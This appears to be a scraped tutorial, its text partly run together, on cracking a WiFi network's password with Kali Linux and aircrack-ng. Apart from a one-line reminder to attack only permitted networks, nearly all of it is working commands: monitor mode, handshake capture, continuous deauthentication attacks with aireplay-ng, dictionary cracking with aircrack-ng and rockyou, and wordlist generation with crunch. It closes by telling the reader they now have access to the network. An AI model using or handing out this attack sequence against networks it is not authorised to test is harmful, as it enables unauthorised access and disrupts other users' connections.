How to hack a WiFi network using Kali Linux and aircrack-ng
Only attack networks you're allowed to attack!
iwconfigsudo airmon-ng check kill
sudo airmon-ng start wlan0
iwconfig againairodump-ngsudo airodump-ng wlan0
BSSID and its channel (CH)sudo airodump-ng -w <filename> -c <channel> --bssid <your-bssid> wlan0
sudo aireplay-ng --deauth 0 -a <your-bssid> wlan0
Make sure to always put in your own BSSID/channel
sudo airmon-ng stop wlan0
aircrack-ngsudo aircrack-ng <filename> -w <wordlist>
rockyou list or any other wordlist you wantA faster way to crack even random passwords would be to use
hashcatand a powerful GPU
crunchcrunchsudo crunch 8 8 abcABC12 -o list.lst
abcABC12 are the characters used in the password-o you specify the name of the listIf you were able to crack the password, you now have access to the WiFi network